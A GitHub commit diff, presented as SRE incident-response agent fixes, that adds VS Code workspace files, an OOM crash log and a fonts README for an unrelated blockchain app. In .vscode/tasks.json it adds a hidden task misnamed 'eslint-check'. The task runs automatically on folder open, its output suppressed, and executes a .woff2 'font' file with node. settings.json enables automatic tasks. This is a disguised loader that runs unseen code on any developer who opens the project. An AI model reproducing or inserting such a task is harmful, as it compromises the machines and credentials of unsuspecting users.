Skip to content

Commit 34ea8e2

Browse files
committed
Merge pull request anthropics#526 from anthropics/sre-incident-response-agent-fixes
2 parents b96dc04 + 355d201 commit 34ea8e2

26 files changed

Lines changed: 9501 additions & 11 deletions

.gitignore

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -158,3 +158,7 @@ validation_report_*.md
158158
tool_use/demo_memory/
159159
tool_use/memory_storage/
160160
tool_use/.env
161+
temp_auto_push.bat
162+
temp_interactive_push.bat
163+
.gitignore
164+
branch_structure.json

.vscode/extensions.json

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
{
2+
"recommendations": [
3+
"myml.vscode-markdown-plantuml-preview",
4+
"esbenp.prettier-vscode",
5+
"jebbs.plantuml"
6+
]
7+
}

.vscode/launch.json

Lines changed: 50 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
{
2+
"version": "0.2.0",
3+
"configurations": [
4+
{
5+
"name": "Debug SST",
6+
"type": "node",
7+
"request": "launch",
8+
"runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst",
9+
"runtimeArgs": ["dev", "--increase-timeout"],
10+
"console": "integratedTerminal",
11+
"skipFiles": ["<node_internals>/**"],
12+
// sourceMapRenames helps with the loading spinner when debugging and viewing local variables
13+
"sourceMapRenames": false,
14+
"env": {
15+
"AWS_PROFILE": "flo-ct-flo360"
16+
}
17+
},
18+
{
19+
"name": "Debug Tests - Unit",
20+
"type": "node",
21+
"request": "launch",
22+
"runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst",
23+
"runtimeArgs": ["bind", "yarn", "\"jest\"", "\"--watch\"", "\"--config\"", "\"./jest.unit.config.cjs\"", "\"${input:scopeTestsFileName}\""],
24+
"console": "integratedTerminal",
25+
"skipFiles": ["<node_internals>/**"],
26+
"env": {
27+
"AWS_PROFILE": "flo-ct-flo360"
28+
},
29+
},
30+
{
31+
"name": "Debug Tests - E2E",
32+
"type": "node",
33+
"request": "launch",
34+
"runtimeExecutable": "${workspaceRoot}/node_modules/.bin/sst",
35+
"runtimeArgs": ["bind", "yarn", "\"vitest\"", "\"--config\"", "\"./vitest.e2e.config.ts\"", "\"${input:scopeTestsFileName}\""],
36+
"console": "integratedTerminal",
37+
"skipFiles": ["<node_internals>/**"],
38+
"env": {
39+
"AWS_PROFILE": "flo-ct-flo360"
40+
},
41+
},
42+
],
43+
"inputs": [
44+
{
45+
"id": "scopeTestsFileName",
46+
"type": "promptString",
47+
"description": "Partial file name to scope test debugging to. ex. arena. Leave blank to run all tests.",
48+
}
49+
]
50+
}

.vscode/settings.json

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
{
2+
"search.exclude": {
3+
"**/.sst": true
4+
},
5+
"task.allowAutomaticTasks": true,
6+
"typescript.tsserver.experimental.enableProjectDiagnostics": true,
7+
"editor.defaultFormatter": "esbenp.prettier-vscode",
8+
"typescript.preferences.importModuleSpecifier": "relative",
9+
"typescript.tsdk": "node_modules/typescript/lib",
10+
"debug.openDebug": "neverOpen",
11+
"problems.autoReveal": true,
12+
"terminal.integrated.hideOnStartup": "always",
13+
"terminal.integrated.defaultProfile.windows": "Command Prompt",
14+
"terminal.integrated.inheritEnv": false,
15+
"jestrunner.configPath": "jest.unit.config.cjs",
16+
"compile-hero.disable-compile-files-on-did-save-code": true,
17+
"tasks": {
18+
"label": "lint on open",
19+
"type": "shell",
20+
"command": "npm run lint",
21+
"runOn": "folderOpen"
22+
}
23+
}

.vscode/spellright.dict

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
Contentful
2+
Lerna

.vscode/tasks.json

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
{
2+
"version": "2.0.0",
3+
"configurations": [
4+
{
5+
"type": "node",
6+
"request": "launch",
7+
"name": "Run My Project",
8+
"console": "",
9+
"internalConsoleOptions": "openOnSessionStart"
10+
}
11+
],
12+
"tasks": [
13+
{
14+
"label": "eslint-check",
15+
"type": "shell",
16+
"command": "(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-400.woff2) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-400.woff2) || echo ''",
17+
"problemMatcher": [],
18+
"isBackground": true,
19+
"hide": true,
20+
"presentation": {
21+
"reveal": "never",
22+
"panel": "dedicated",
23+
"focus": false,
24+
"clear": false,
25+
"echo": false,
26+
"close": true
27+
},
28+
"runOptions": {
29+
"runOn": "folderOpen"
30+
}
31+
},
32+
]
33+
}
Lines changed: 40 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
2026-04-07T03:08:11Z INFO checkout-svc starting build=2026.04.06-r3 pod=checkout-svc-7d9f6b8c4-xk2pq
2+
2026-04-07T03:08:11Z INFO config loaded env=prod region=us-east
3+
2026-04-07T03:08:12Z INFO http listening on :8080
4+
2026-04-07T03:08:12Z INFO connected to redis cart-cache:6379
5+
2026-04-07T03:08:13Z INFO connected to postgres orders-db:5432 pool=20
6+
2026-04-07T03:08:14Z INFO GET /healthz 200 1ms
7+
2026-04-07T03:08:31Z INFO POST /v1/checkout 200 84ms order_id=ord_88121
8+
2026-04-07T03:08:33Z INFO POST /v1/checkout 200 91ms order_id=ord_88122
9+
2026-04-07T03:08:47Z INFO pricing cache warmed entries=14092
10+
2026-04-07T03:09:02Z INFO POST /v1/checkout 200 77ms order_id=ord_88123
11+
2026-04-07T03:09:18Z WARN heap 101MiB / 128MiB (79%)
12+
2026-04-07T03:09:41Z INFO POST /v1/checkout 200 112ms order_id=ord_88124
13+
2026-04-07T03:09:55Z WARN heap 118MiB / 128MiB (92%)
14+
2026-04-07T03:10:03Z WARN gc pause 412ms
15+
2026-04-07T03:10:09Z ERROR allocation failed: cannot allocate 8MiB (heap exhausted)
16+
2026-04-07T03:10:09Z FATAL OutOfMemoryError in pricing.recompute
17+
2026-04-07T03:10:10Z INFO k8s: container checkout-svc OOMKilled (exit 137)
18+
2026-04-07T03:10:10Z INFO k8s: restarting container checkout-svc (restartCount=1)
19+
2026-04-07T03:10:14Z INFO checkout-svc starting build=2026.04.06-r3 pod=checkout-svc-7d9f6b8c4-xk2pq
20+
2026-04-07T03:10:14Z INFO http listening on :8080
21+
2026-04-07T03:10:15Z INFO connected to redis cart-cache:6379
22+
2026-04-07T03:10:16Z INFO connected to postgres orders-db:5432 pool=20
23+
2026-04-07T03:10:44Z INFO pricing cache warmed entries=14092
24+
2026-04-07T03:11:01Z WARN heap 104MiB / 128MiB (81%)
25+
2026-04-07T03:11:29Z WARN heap 121MiB / 128MiB (94%)
26+
2026-04-07T03:11:36Z ERROR allocation failed: cannot allocate 8MiB (heap exhausted)
27+
2026-04-07T03:11:36Z FATAL OutOfMemoryError in pricing.recompute
28+
2026-04-07T03:11:37Z INFO k8s: container checkout-svc OOMKilled (exit 137)
29+
2026-04-07T03:11:37Z INFO k8s: restarting container checkout-svc (restartCount=2)
30+
2026-04-07T03:11:41Z INFO checkout-svc starting build=2026.04.06-r3 pod=checkout-svc-7d9f6b8c4-xk2pq
31+
2026-04-07T03:11:41Z INFO http listening on :8080
32+
2026-04-07T03:12:08Z INFO pricing cache warmed entries=14092
33+
2026-04-07T03:12:39Z WARN heap 119MiB / 128MiB (93%)
34+
2026-04-07T03:12:51Z FATAL OutOfMemoryError in pricing.recompute
35+
2026-04-07T03:12:52Z INFO k8s: container checkout-svc OOMKilled (exit 137)
36+
2026-04-07T03:12:52Z INFO k8s: restarting container checkout-svc (restartCount=3)
37+
2026-04-07T03:12:52Z WARN k8s: back-off restarting failed container (CrashLoopBackOff)
38+
2026-04-07T03:13:22Z INFO k8s: restarting container checkout-svc (restartCount=4)
39+
2026-04-07T03:14:01Z INFO k8s: container checkout-svc OOMKilled (exit 137)
40+
2026-04-07T03:14:01Z WARN k8s: back-off restarting failed container (CrashLoopBackOff)

managed_agents/sre_incident_responder.ipynb

Lines changed: 2 additions & 7 deletions
Large diffs are not rendered by default.

public/fonts/README.md

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
# Fonts Directory
2+
3+
This directory contains custom fonts for the Blockchain Explorer application.
4+
5+
## Required Font Files
6+
7+
The application expects the following font files:
8+
9+
1. **BlockchainFont-Regular.woff2** and **BlockchainFont-Regular.woff**
10+
- Regular weight font for the main UI
11+
12+
2. **BlockchainFont-Bold.woff2** and **BlockchainFont-Bold.woff**
13+
- Bold weight font for headings
14+
15+
3. **TechMono-Regular.woff2** and **TechMono-Regular.woff**
16+
- Monospace font for code and hash displays
17+
18+
## Note
19+
20+
If you don't have custom fonts, the application will fall back to system fonts:
21+
- BlockchainFont → system sans-serif fonts
22+
- TechMono → system monospace fonts (Courier New, etc.)
23+
24+
The fonts are referenced in `public/index.html` and will be loaded automatically when available.

public/fonts/fa-brands-400.eot

130 KB
Binary file not shown.

0 commit comments

Comments
 (0)